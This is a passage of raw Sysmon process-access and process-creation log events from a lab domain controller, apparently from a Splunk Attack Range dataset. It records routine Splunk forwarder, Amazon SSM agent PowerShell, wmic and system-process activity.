ws\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.662{08A6967A-429B-6000-5A00-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.651{08A6967A-429B-6000-5900-000000009A01}38083788C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.644{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5900-000000009A01}3808C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.640{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-4298-6000-3000-000000009A01}23763608C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.639{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.603{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.603{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.585{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.585{08A6967A-429B-6000-5700-000000009A01}28842804C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.577{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5700-000000009A01}2884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.574{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.574{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.574{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.574{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.573{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.573{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 